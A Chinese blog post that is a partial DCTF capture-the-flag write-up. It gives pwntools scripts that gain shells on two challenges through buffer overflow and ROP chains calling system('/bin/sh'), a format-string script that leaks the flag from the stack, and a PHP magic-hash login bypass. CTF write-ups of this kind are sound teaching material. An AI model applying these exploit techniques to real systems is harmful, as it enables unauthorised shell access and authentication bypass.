DCTF-wp部分

最新推荐文章于 2022-04-19 10:04:38 发布

赛博雨天

最新推荐文章于 2022-04-19 10:04:38 发布

阅读量582

点赞数

分类专栏： ctf 文章标签： web pwn

本文链接：https://blog.csdn.net/yutianovo/article/details/116913042

版权

ctf 专栏收录该内容

4 篇文章 0 订阅

订阅专栏

pwn

Pwn sanity check

https://blog.yutian233.xyz/

from pwn import *
context.log_level = 'debug'
# io = process("./pwn_sanity_check")
io = remote("dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io", 7480)

pop_rdi = 0x0000000000400813
system_plt = 0x4006e2
bin_sh = 0x40089E
payload = b"A" * (0x40 + 8) + p64(pop_rdi) + p64(bin_sh) + p64(system_plt)

io.sendline(payload)
io.interactive()

Pinch me

from pwn import *
context.log_level = 'debug'
# io = process("./pinch_me")
io = remote("dctf1-chall-pinch-me.westeurope.azurecontainer.io", 7480)

pop_rdi = 0x000000000040125b
system_plt = 0x4011a8
bin_sh = 0x402047
payload = b"A" * (0x20 + 8) + p64(pop_rdi) + p64(bin_sh) + p64(system_plt)

io.sendline(payload)
io.interactive()

Readme

格式化字符串漏洞，程序会从flag.txt读取并存放在栈中，然后写个脚本一个一个读出来就好了

from pwn import *
import re

flag = []

for i in range(8, 17):
	io = remote("dctf-chall-readme.westeurope.azurecontainer.io", 7481)

	pad = "%{}$p".format(i)
	io.sendline(pad)
	io.recvline()
	val = io.recvline()
	# print(val)
	val = re.findall("0x(.*)", str(val))
	# flag.append(val)
	print(val)

得到

[
'77306e7b66746364',
'646133725f30675f',
'30625f656d30735f',
'7f1800356b30',
'a7024323125',
'55d702c4f97d',
'7fda27a53fc8',
'56487a688930'
]

转码得到

dctf{n0w_g0_r3ad_s0me_b0%12$p
0k5

将得到的flag拼接一下为 dctf{n0w_g0_r3ad_s0me_b00k5}

web

Very secure website

根据 https://www.whitehatsec.com/blog/magic-hashes/ 0e

传入 /login.php?username=admin&password=479763000，得到flag

赛博雨天

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
DCTF-wp部分

pwnPwn sanity checkfrom pwn import *context.log_level = 'debug'# io = process("./pwn_sanity_check")io = remote("dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io", 7480)pop_rdi = 0x0000000000400813system_plt = 0x4006e2bin_sh = 0x40089Epayl
复制链接

扫一扫

专栏目录